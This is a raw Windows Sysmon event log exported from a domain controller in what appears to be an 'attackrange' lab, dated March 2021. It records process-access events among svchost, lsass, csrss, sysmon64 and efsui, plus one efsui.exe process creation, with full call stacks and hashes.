12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.887{266CAFBE-646A-6064-0B00-00000000AE01}856880C:\Windows\system32\lsass.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\efsext.dll+2d2c|C:\Windows\system32\EFSCORE.dll+18451|C:\Windows\system32\EFSCORE.dll+17c2a|C:\Windows\system32\EFSCORE.dll+17805|C:\Windows\system32\EFSCORE.dll+18bd|C:\Windows\system32\efssvc.dll+1337|C:\Windows\System32\sechost.dll+b71a|C:\Windows\System32\sechost.dll+a574|C:\Windows\system32\lsasrv.dll+5361e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.897{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\System32\efsui.exe10.0.14393.0 (rs1_release.160715-1616)EFS UI ApplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationefsui.exeefsui.exe /efs /installdraC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=6DFA1BBB4D2F89DC46BACABC83B6AB95,SHA256=1106CE6AE6EDFFA752D71F5EFF9FAAB53360CFFC6B224957760FBDC0A7D4FF17,IMPHASH=B865E978ADDB9A939A91896A60E81464{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeC:\Windows\system32\lsass.exe 10341000x80000000000000004303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
